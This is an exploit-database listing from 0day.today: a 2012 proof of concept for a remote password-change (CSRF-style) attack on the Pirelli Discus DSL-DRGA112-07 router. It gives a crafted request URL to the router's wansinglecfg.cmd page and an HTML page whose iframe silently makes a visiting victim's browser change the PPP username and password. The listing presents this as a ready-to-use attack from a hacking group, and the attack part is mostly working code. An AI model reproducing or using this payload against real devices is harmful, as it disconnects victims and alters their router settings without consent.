[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Pirelli Discus DSL-DRGA112-07 Remote Change Password

Author
Daniel Godoy
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-17530
Category
web applications
Date add
17-02-2012
Platform
hardware
# Exploit Title: Pirelli Discus DSL-DRGA112-07 Remote Change Password
# Date: 17/02/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Hardware: Pirelli Discus DSL-DRGA112-07 DSL-DRGA112-07
# Tested on: Linux

 
[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
Maximiliano Soler
    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.comar
    #RemoteExecution Hacking Group

[PoC]

failure may be exploited if the attacker makes his victim enter the following URL:

http://10.0.0.2/wansinglecfg.cmd?action=modify&UsernamePPP = [number] & PasswordPPP = [password]

automatically be reset his connection with new data and therefore will not have internet connection and your data will be modified.

[Exploit]

<html>
<head>
</head>
    <body>
        <iframe src="http://10.0.0.2/wansinglecfg.cmd?action=modify&UsernamePPP=[number]&PasswordPPP=[password]">
    </body>
</html>



#  0day.today [2024-11-15]  #